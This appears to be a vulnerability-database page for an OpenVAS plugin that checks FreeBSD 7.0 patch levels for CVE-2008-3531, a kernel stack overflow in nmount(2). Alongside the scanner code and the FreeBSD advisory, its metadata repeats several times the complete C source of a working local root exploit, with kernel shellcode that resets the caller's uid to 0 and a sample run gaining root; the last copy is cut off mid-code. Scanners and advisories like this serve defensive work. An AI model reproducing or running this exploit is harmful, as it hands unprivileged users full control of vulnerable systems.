ID OPENVAS:61514 Type openvas Reporter Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com Modified 2017-12-07T00:00:00
Description
The remote host is missing an update to the system
as announced in the referenced advisory FreeBSD-SA-08:08.nmount.asc
#
#ADV FreeBSD-SA-08:08.nmount.asc
# OpenVAS Vulnerability Test
# $
# Description: Auto generated from ADV FreeBSD-SA-08:08.nmount.asc
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisories, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Report text for the plugin. The three strings below are excerpted from the
# FreeBSD advisory named in the header and are handed to script_tag() in the
# description branch; keep them verbatim so the report matches the advisory.
tag_summary = "The remote host is missing an update to the system
as announced in the referenced advisory FreeBSD-SA-08:08.nmount.asc";

# Background and problem description: the kernel stack buffer is only
# reachable by unprivileged users when the vfs.usermount sysctl is set.
tag_insight = "The mount(2) and nmount(2) system calls are used by various utilities
in the base system to graft a file system object on to the file system
tree to a given mount point. It is possible to allow unprivileged
users to utililize these system calls by setting the vfs.usermount
sysctl(8) variable.
Various user defined input such as mount points, devices, and mount
options are prepared and passed as arguments to nmount(2) into the
kernel. Under certain error conditions, user defined data will be
copied into a stack allocated buffer stored in the kernel without
sufficient bounds checking.";

# Vendor fix, plus the securityspace.com pointer for this advisory.
tag_solution = "Upgrade your system to the appropriate stable release
or security branch dated after the correction date
https://secure1.securityspace.com/smysecure/catid.html?in=FreeBSD-SA-08:08.nmount.asc";
if(description)
{
  # Plugin identity and bookkeeping.
  script_id(61514);
  script_version("$Revision: 8023 $");
  script_tag(name:"last_modification", value:"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $");
  script_tag(name:"creation_date", value:"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)");

  # Vulnerability reference and severity. The vector is local access with
  # medium complexity: per tag_insight the overflow is only reachable by an
  # unprivileged user when vfs.usermount is enabled.
  script_cve_id("CVE-2008-3531");
  script_tag(name:"cvss_base", value:"6.9");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:M/Au:N/C:C/I:C/A:C");

  script_name("FreeBSD Security Advisory (FreeBSD-SA-08:08.nmount.asc)");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com");
  script_family("FreeBSD Local Security Checks");

  # Local package-level check: it depends on the FreeBSD patch level that
  # gather-package-list.nasl stores under ssh/login/freebsdpatchlevel, so an
  # SSH login must have succeeded first.
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/freebsdpatchlevel", "login/SSH/success");

  # Report text (defined at file scope) and result quality.
  script_tag(name:"insight", value:tag_insight);
  script_tag(name:"solution", value:tag_solution);
  script_tag(name:"summary", value:tag_summary);
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}
#
# The script code starts here
#
include("pkg-lib-bsd.inc");

# Patch-level check only. The advisory lists the fix as 7.0-RELEASE-p4 on
# RELENG_7_0, so patchlevelcmp() from pkg-lib-bsd.inc is expected to return
# a negative value for a 7.0 host below patch level 4, which is then reported.
# Two limits of this approach matter when triaging results:
#  - a host mitigated with the documented workaround (vfs.usermount=0) is
#    still reported, because only the patch level is examined;
#  - the RELENG_7 (7.1-PRERELEASE) side of the fix is not checked here.
if(patchlevelcmp(rel:"7.0", patchlevel:"4") < 0) {
  security_message(0);
} else if(__pkg_match) {
  exit(99); # Not vulnerable.
}
{"id": "OPENVAS:61514", "type": "openvas", "bulletinFamily": "scanner", "title": "FreeBSD Security Advisory (FreeBSD-SA-08:08.nmount.asc)", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory FreeBSD-SA-08:08.nmount.asc", "published": "2008-09-04T00:00:00", "modified": "2017-12-07T00:00:00", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=61514", "reporter": "Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2008-3531"], "lastseen": "2017-12-08T11:44:53", "viewCount": 1, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2017-12-08T11:44:53", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3531"]}, {"type": "exploitdb", "idList": ["EDB-ID:9082"]}, {"type": "seebug", "idList": ["SSV:11781", "SSV:3982"]}, {"type": "freebsd", "idList": ["7DBB7197-7B68-11DD-80BA-000BCDF0A03B"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9267", "SECURITYVULNS:DOC:20467"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:CCC81755021F2F33AC4AB350A8FC7FEE"]}], "modified": "2017-12-08T11:44:53", "rev": 2}, "vulnersScore": 6.6}, "pluginID": "61514", "sourceData": "#\n#ADV FreeBSD-SA-08:08.nmount.asc\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from ADV FreeBSD-SA-08:08.nmount.asc\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_insight = \"The mount(2) and nmount(2) system calls are used by various utilities\nin the base system to graft a file system object on to the file system\ntree to a given mount point. It is possible to allow unprivileged\nusers to utililize these system calls by setting the vfs.usermount\nsysctl(8) variable.\n\nVarious user defined input such as mount points, devices, and mount\noptions are prepared and passed as arguments to nmount(2) into the\nkernel. 
Under certain error conditions, user defined data will be\ncopied into a stack allocated buffer stored in the kernel without\nsufficient bounds checking.\";\ntag_solution = \"Upgrade your system to the appropriate stable release\nor security branch dated after the correction date\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FreeBSD-SA-08:08.nmount.asc\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory FreeBSD-SA-08:08.nmount.asc\";\n\n\nif(description)\n{\n script_id(61514);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2008-3531\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n name = \"FreeBSD Security Advisory (FreeBSD-SA-08:08.nmount.asc)\";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n family = \"FreeBSD Local Security Checks\";\n script_family(family);\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdpatchlevel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\nvuln = 0;\nif(patchlevelcmp(rel:\"7.0\", patchlevel:\"4\")<0) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "FreeBSD Local Security Checks"}
{"cve": [{"lastseen": "2020-10-03T11:51:00", "description": "Stack-based buffer overflow in sys/kern/vfs_mount.c in the kernel in FreeBSD 7.0 and 7.1, when vfs.usermount is enabled, allows local users to gain privileges via a crafted (1) mount or (2) nmount system call, related to copying of \"user defined data\" in \"certain error conditions.\"", "edition": 3, "cvss3": {}, "published": "2008-09-05T16:08:00", "title": "CVE-2008-3531", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3531"], "modified": "2017-08-08T01:31:00", "cpe": ["cpe:/o:freebsd:freebsd:7.1", "cpe:/o:freebsd:freebsd:7.0"], "id": "CVE-2008-3531", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3531", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:freebsd:freebsd:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T09:50:03", "description": "FreeBSD 7.0/7.1 vfs.usermount Local Privilege Escalation Exploit. CVE-2008-3531. 
Local exploit for freebsd platform", "published": "2009-07-09T00:00:00", "type": "exploitdb", "title": "FreeBSD 7.0/7.1 vfs.usermount - Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3531"], "modified": "2009-07-09T00:00:00", "id": "EDB-ID:9082", "href": "https://www.exploit-db.com/exploits/9082/", "sourceData": "/* \r\n * cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com\r\n *\r\n * Privilege escalation exploit for the FreeBSD-SA-08:08.nmount\r\n * (CVE-2008-3531) vulnerability:\r\n * \r\n * http://security.freebsd.org/advisories/FreeBSD-SA-08:08.nmount.asc\r\n * http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3531\r\n *\r\n * For a detailed analysis see:\r\n *\r\n * http://census-labs.com/news/2009/07/02/cve-2008-3531-exploit/\r\n * \r\n * Sample run:\r\n * \r\n * [argp@leon ~]$ uname -rsi\r\n * FreeBSD 7.0-RELEASE GENERIC\r\n * [argp@leon ~]$ sysctl vfs.usermount\r\n * vfs.usermount: 1\r\n * [argp@leon ~]$ id\r\n * uid=1001(argp) gid=1001(argp) groups=1001(argp)\r\n * [argp@leon ~]$ gcc -Wall cve-2008-3531.c -o cve-2008-3531\r\n * [argp@leon ~]$ ./cve-2008-3531\r\n * [*] vptr = 0x006e776f\r\n * [*] calling nmount()\r\n * nmount: Unknown error: -1036235776\r\n * [argp@leon ~]$ id\r\n * uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp)\r\n *\r\n * $Id: cve-2008-3531.c,v 846ca34be34a 2009/02/29 11:05:02 argp $\r\n */\r\n\r\n#include <sys/param.h>\r\n#include <sys/mount.h>\r\n#include <sys/uio.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sysexits.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/mman.h>\r\n\r\n#define BUFSIZE 249\r\n\r\n#define PAGESIZE 4096\r\n#define ADDR 0x6e7000\r\n#define OFFSET 1903\r\n\r\n#define FSNAME \"msdosfs\"\r\n#define DIRPATH \"/tmp/msdosfs\"\r\n\r\nunsigned char kernelcode[] =\r\n\"\\x64\\xa1\\x00\\x00\\x00\\x00\" /* movl %fs:0, %eax # get curthread 
*/\r\n\"\\x8b\\x40\\x04\" /* movl 0x4(%eax), %eax # get proc from curthread */\r\n\"\\x8b\\x40\\x30\" /* movl 0x30(%eax),%eax # get ucred from proc */\r\n\"\\x31\\xc9\" /* xorl %ecx, %ecx # ecx = 0 */\r\n\"\\x89\\x48\\x04\" /* movl %ecx, 0x4(%eax) # ucred.uid = 0 */\r\n\"\\x89\\x48\\x08\" /* movl %ecx, 0x8(%eax) # ucred.ruid = 0 */\r\n /* # return to the pre-previous function, i.e. vfs_donmount() */\r\n\"\\x81\\xc4\\xe8\\x00\\x00\\x00\" /* addl $0xe8, %esp */\r\n\"\\x5b\" /* popl %ebx */\r\n\"\\x5e\" /* popl %esi */\r\n\"\\x5f\" /* popl %edi */\r\n\"\\x5d\" /* popl %ebp */\r\n\"\\xc3\"; /* ret */\r\n\r\nint\r\nmain()\r\n{\r\n void *vptr;\r\n struct iovec iov[6];\r\n\r\n vptr = mmap((void *)ADDR, PAGESIZE, PROT_READ | PROT_WRITE,\r\n MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);\r\n\r\n if(vptr == MAP_FAILED)\r\n {\r\n perror(\"mmap\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n vptr += OFFSET;\r\n printf(\"[*] vptr = 0x%.8x\\n\", (unsigned int)vptr);\r\n\r\n memcpy(vptr, kernelcode, (sizeof(kernelcode) - 1));\r\n\r\n mkdir(DIRPATH, 0700);\r\n\r\n iov[0].iov_base = \"fstype\";\r\n iov[0].iov_len = strlen(iov[0].iov_base) + 1;\r\n \r\n iov[1].iov_base = FSNAME;\r\n iov[1].iov_len = strlen(iov[1].iov_base) + 1;\r\n \r\n iov[2].iov_base = \"fspath\";\r\n iov[2].iov_len = strlen(iov[2].iov_base) + 1;\r\n \r\n iov[3].iov_base = DIRPATH;\r\n iov[3].iov_len = strlen(iov[3].iov_base) + 1;\r\n\r\n iov[4].iov_base = calloc(BUFSIZE, sizeof(char));\r\n\r\n if(iov[4].iov_base == NULL)\r\n {\r\n perror(\"calloc\");\r\n rmdir(DIRPATH);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n memset(iov[4].iov_base, 0x41, (BUFSIZE - 1));\r\n iov[4].iov_len = BUFSIZE;\r\n\r\n iov[5].iov_base = \"BBBB\";\r\n iov[5].iov_len = strlen(iov[5].iov_base) + 1;\r\n\r\n printf(\"[*] calling nmount()\\n\");\r\n\r\n if(nmount(iov, 6, 0) < 0)\r\n {\r\n perror(\"nmount\");\r\n rmdir(DIRPATH);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n printf(\"[*] unmounting and deleting %s\\n\", DIRPATH);\r\n unmount(DIRPATH, 0);\r\n 
rmdir(DIRPATH);\r\n\r\n return EXIT_SUCCESS;\r\n}\r\n\r\n// milw0rm.com [2009-07-09]\r\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9082/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "cvelist": ["CVE-2008-3531"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n=============================================================================\r\nFreeBSD-SA-08:08.nmount Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: nmount(2) local arbitrary code execution\r\n\r\nCategory: core\r\nModule: sys_kern\r\nAnnounced: 2008-09-03\r\nCredits: James Gritton\r\nAffects: FreeBSD 7.0-RELEASE, FreeBSD 7.0-STABLE\r\nCorrected: 2008-09-03 19:09:47 UTC (RELENG_7, 7.1-PRERELEASE)\r\n 2008-09-03 19:09:47 UTC (RELENG_7_0, 7.0-RELEASE-p4)\r\nCVE Name: CVE-2008-3531\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit <URL:http://security.FreeBSD.org/>.\r\n\r\nI. Background\r\n\r\nThe mount(2) and nmount(2) system calls are used by various utilities\r\nin the base system to graft a file system object on to the file system\r\ntree to a given mount point. It is possible to allow unprivileged\r\nusers to utililize these system calls by setting the vfs.usermount\r\nsysctl(8) variable.\r\n\r\nII. Problem Description\r\n\r\nVarious user defined input such as mount points, devices, and mount\r\noptions are prepared and passed as arguments to nmount(2) into the\r\nkernel. Under certain error conditions, user defined data will be\r\ncopied into a stack allocated buffer stored in the kernel without\r\nsufficient bounds checking.\r\n\r\nIII. 
Impact\r\n\r\nIf the system is configured to allow unprivileged users to mount file\r\nsystems, it is possible for a local adversary to exploit this\r\nvulnerability and execute code in the context of the kernel.\r\n\r\nIV. Workaround\r\n\r\nIt is possible to work around this issue by allowing only privileged\r\nusers to mount file systems by running the following sysctl(8)\r\ncommand:\r\n\r\n# sysctl vfs.usermount=0\r\n\r\nV. Solution\r\n\r\nNOTE WELL: Even with this fix allowing users to mount arbitrary media\r\nshould not be considered safe. Most of the file systems in FreeBSD\r\nwas not built to protect safeguard against malicious devices. While\r\nsuch bugs in file systems are fixed when found, a complete audit has\r\nnot been perfomed on the file system code.\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade your vulnerable system to 7-STABLE, or to the RELENG_7_0\r\nsecurity branch dated after the correction date.\r\n\r\n2) To patch your present system:\r\n\r\nThe following patches have been verified to apply to FreeBSD 7.0 systems.\r\n\r\na) Download the relevant patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n# fetch http://security.FreeBSD.org/patches/SA-08:08/nmount.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-08:08/nmount.patch.asc\r\n\r\nb) Apply the patch.\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\n\r\nc) Recompile your kernel as described in\r\n<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the\r\nsystem.\r\n\r\nVI. 
Correction details\r\n\r\nThe following list contains the revision numbers of each file that was\r\ncorrected in FreeBSD.\r\n\r\nBranch Revision\r\n Path\r\n- -------------------------------------------------------------------------\r\nRELENG_7\r\n src/sys/kern/vfs_mount.c 1.265.2.10\r\nRELENG_7_0\r\n src/UPDATING 1.507.2.3.2.8\r\n src/sys/conf/newvers.sh 1.72.2.5.2.8\r\n src/sys/kern/vfs_mount.c 1.265.2.1.2.2\r\n- -------------------------------------------------------------------------\r\n\r\nVII. References\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3531\r\n\r\nThe latest revision of this advisory is available at\r\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-08:08.nmount.asc\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (FreeBSD)\r\n\r\niD8DBQFIvu2eFdaIBMps37IRAl9BAJ9Jnp+agN06pBkzPDwEnOT83MNd6QCghOFX\r\nyvNI1gVmhAQ7MXOUvPoLcLk=\r\n=EsCn\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-09-07T00:00:00", "published": "2008-09-07T00:00:00", "id": "SECURITYVULNS:DOC:20467", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20467", "title": "FreeBSD Security Advisory FreeBSD-SA-08:08.nmount", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:30", "bulletinFamily": "software", "cvelist": ["CVE-2008-3530", "CVE-2008-3531", "CVE-2008-3890"], "description": "mount / nmount syscall implementcation buffer overflow. amd64 CPU registers privilege escalation. 
DoS \u0447\u0435\u0440\u0435\u0437 ICMPv6.", "edition": 1, "modified": "2009-07-03T00:00:00", "published": "2009-07-03T00:00:00", "id": "SECURITYVULNS:VULN:9267", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9267", "title": "FreeBSD multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:16", "description": "\nFreeBSD 7.07.1 - vfs.usermount Local Privilege Escalation", "edition": 1, "published": "2009-07-09T00:00:00", "title": "FreeBSD 7.07.1 - vfs.usermount Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3531"], "modified": "2009-07-09T00:00:00", "id": "EXPLOITPACK:CCC81755021F2F33AC4AB350A8FC7FEE", "href": "", "sourceData": "/* \n * cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com\n *\n * Privilege escalation exploit for the FreeBSD-SA-08:08.nmount\n * (CVE-2008-3531) vulnerability:\n * \n * http://security.freebsd.org/advisories/FreeBSD-SA-08:08.nmount.asc\n * http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3531\n *\n * For a detailed analysis see:\n *\n * http://census-labs.com/news/2009/07/02/cve-2008-3531-exploit/\n * \n * Sample run:\n * \n * [argp@leon ~]$ uname -rsi\n * FreeBSD 7.0-RELEASE GENERIC\n * [argp@leon ~]$ sysctl vfs.usermount\n * vfs.usermount: 1\n * [argp@leon ~]$ id\n * uid=1001(argp) gid=1001(argp) groups=1001(argp)\n * [argp@leon ~]$ gcc -Wall cve-2008-3531.c -o cve-2008-3531\n * [argp@leon ~]$ ./cve-2008-3531\n * [*] vptr = 0x006e776f\n * [*] calling nmount()\n * nmount: Unknown error: -1036235776\n * [argp@leon ~]$ id\n * uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp)\n *\n * $Id: cve-2008-3531.c,v 846ca34be34a 2009/02/29 11:05:02 argp $\n */\n\n#include <sys/param.h>\n#include <sys/mount.h>\n#include <sys/uio.h>\n#include <err.h>\n#include <stdio.h>\n#include 
<stdlib.h>\n#include <string.h>\n#include <sysexits.h>\n#include <unistd.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <sys/mman.h>\n\n#define BUFSIZE 249\n\n#define PAGESIZE 4096\n#define ADDR 0x6e7000\n#define OFFSET 1903\n\n#define FSNAME \"msdosfs\"\n#define DIRPATH \"/tmp/msdosfs\"\n\nunsigned char kernelcode[] =\n\"\\x64\\xa1\\x00\\x00\\x00\\x00\" /* movl %fs:0, %eax # get curthread */\n\"\\x8b\\x40\\x04\" /* movl 0x4(%eax), %eax # get proc from curthread */\n\"\\x8b\\x40\\x30\" /* movl 0x30(%eax),%eax # get ucred from proc */\n\"\\x31\\xc9\" /* xorl %ecx, %ecx # ecx = 0 */\n\"\\x89\\x48\\x04\" /* movl %ecx, 0x4(%eax) # ucred.uid = 0 */\n\"\\x89\\x48\\x08\" /* movl %ecx, 0x8(%eax) # ucred.ruid = 0 */\n /* # return to the pre-previous function, i.e. vfs_donmount() */\n\"\\x81\\xc4\\xe8\\x00\\x00\\x00\" /* addl $0xe8, %esp */\n\"\\x5b\" /* popl %ebx */\n\"\\x5e\" /* popl %esi */\n\"\\x5f\" /* popl %edi */\n\"\\x5d\" /* popl %ebp */\n\"\\xc3\"; /* ret */\n\nint\nmain()\n{\n void *vptr;\n struct iovec iov[6];\n\n vptr = mmap((void *)ADDR, PAGESIZE, PROT_READ | PROT_WRITE,\n MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);\n\n if(vptr == MAP_FAILED)\n {\n perror(\"mmap\");\n exit(EXIT_FAILURE);\n }\n\n vptr += OFFSET;\n printf(\"[*] vptr = 0x%.8x\\n\", (unsigned int)vptr);\n\n memcpy(vptr, kernelcode, (sizeof(kernelcode) - 1));\n\n mkdir(DIRPATH, 0700);\n\n iov[0].iov_base = \"fstype\";\n iov[0].iov_len = strlen(iov[0].iov_base) + 1;\n \n iov[1].iov_base = FSNAME;\n iov[1].iov_len = strlen(iov[1].iov_base) + 1;\n \n iov[2].iov_base = \"fspath\";\n iov[2].iov_len = strlen(iov[2].iov_base) + 1;\n \n iov[3].iov_base = DIRPATH;\n iov[3].iov_len = strlen(iov[3].iov_base) + 1;\n\n iov[4].iov_base = calloc(BUFSIZE, sizeof(char));\n\n if(iov[4].iov_base == NULL)\n {\n perror(\"calloc\");\n rmdir(DIRPATH);\n exit(EXIT_FAILURE);\n }\n\n memset(iov[4].iov_base, 0x41, (BUFSIZE - 1));\n iov[4].iov_len = BUFSIZE;\n\n iov[5].iov_base = \"BBBB\";\n iov[5].iov_len = 
strlen(iov[5].iov_base) + 1;\n\n printf(\"[*] calling nmount()\\n\");\n\n if(nmount(iov, 6, 0) < 0)\n {\n perror(\"nmount\");\n rmdir(DIRPATH);\n exit(EXIT_FAILURE);\n }\n\n printf(\"[*] unmounting and deleting %s\\n\", DIRPATH);\n unmount(DIRPATH, 0);\n rmdir(DIRPATH);\n\n return EXIT_SUCCESS;\n}\n\n// milw0rm.com [2009-07-09]", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:45:17", "description": "No description provided by source.", "published": "2009-07-10T00:00:00", "type": "seebug", "title": "FreeBSD 7.0/7.1 vfs.usermount Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3531"], "modified": "2009-07-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11781", "id": "SSV:11781", "sourceData": "\n /* \r\n * cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com\r\n *\r\n * Privilege escalation exploit for the FreeBSD-SA-08:08.nmount\r\n * (CVE-2008-3531) vulnerability:\r\n * \r\n * http://security.freebsd.org/advisories/FreeBSD-SA-08:08.nmount.asc\r\n * http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3531\r\n *\r\n * For a detailed analysis see:\r\n *\r\n * http://census-labs.com/news/2009/07/02/cve-2008-3531-exploit/\r\n * \r\n * Sample run:\r\n * \r\n * [argp@leon ~]$ uname -rsi\r\n * FreeBSD 7.0-RELEASE GENERIC\r\n * [argp@leon ~]$ sysctl vfs.usermount\r\n * vfs.usermount: 1\r\n * [argp@leon ~]$ id\r\n * uid=1001(argp) gid=1001(argp) groups=1001(argp)\r\n * [argp@leon ~]$ gcc -Wall cve-2008-3531.c -o cve-2008-3531\r\n * [argp@leon ~]$ ./cve-2008-3531\r\n * [*] vptr = 0x006e776f\r\n * [*] calling nmount()\r\n * nmount: Unknown error: -1036235776\r\n * [argp@leon ~]$ id\r\n * uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp)\r\n *\r\n * $Id: cve-2008-3531.c,v 846ca34be34a 2009/02/29 11:05:02 argp $\r\n */\r\n\r\n#include <sys/param.h>\r\n#include <sys/mount.h>\r\n#include <sys/uio.h>\r\n#include <err.h>\r\n#include 
<stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sysexits.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/mman.h>\r\n\r\n#define BUFSIZE 249\r\n\r\n#define PAGESIZE 4096\r\n#define ADDR 0x6e7000\r\n#define OFFSET 1903\r\n\r\n#define FSNAME "msdosfs"\r\n#define DIRPATH "/tmp/msdosfs"\r\n\r\nunsigned char kernelcode[] =\r\n"\\x64\\xa1\\x00\\x00\\x00\\x00" /* movl %fs:0, %eax # get curthread */\r\n"\\x8b\\x40\\x04" /* movl 0x4(%eax), %eax # get proc from curthread */\r\n"\\x8b\\x40\\x30" /* movl 0x30(%eax),%eax # get ucred from proc */\r\n"\\x31\\xc9" /* xorl %ecx, %ecx # ecx = 0 */\r\n"\\x89\\x48\\x04" /* movl %ecx, 0x4(%eax) # ucred.uid = 0 */\r\n"\\x89\\x48\\x08" /* movl %ecx, 0x8(%eax) # ucred.ruid = 0 */\r\n /* # return to the pre-previous function, i.e. vfs_donmount() */\r\n"\\x81\\xc4\\xe8\\x00\\x00\\x00" /* addl $0xe8, %esp */\r\n"\\x5b" /* popl %ebx */\r\n"\\x5e" /* popl %esi */\r\n"\\x5f" /* popl %edi */\r\n"\\x5d" /* popl %ebp */\r\n"\\xc3"; /* ret */\r\n\r\nint\r\nmain()\r\n{\r\n void *vptr;\r\n struct iovec iov[6];\r\n\r\n vptr = mmap((void *)ADDR, PAGESIZE, PROT_READ | PROT_WRITE,\r\n MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);\r\n\r\n if(vptr == MAP_FAILED)\r\n {\r\n perror("mmap");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n vptr += OFFSET;\r\n printf("[*] vptr = 0x%.8x\\n", (unsigned int)vptr);\r\n\r\n memcpy(vptr, kernelcode, (sizeof(kernelcode) - 1));\r\n\r\n mkdir(DIRPATH, 0700);\r\n\r\n iov[0].iov_base = "fstype";\r\n iov[0].iov_len = strlen(iov[0].iov_base) + 1;\r\n \r\n iov[1].iov_base = FSNAME;\r\n iov[1].iov_len = strlen(iov[1].iov_base) + 1;\r\n \r\n iov[2].iov_base = "fspath";\r\n 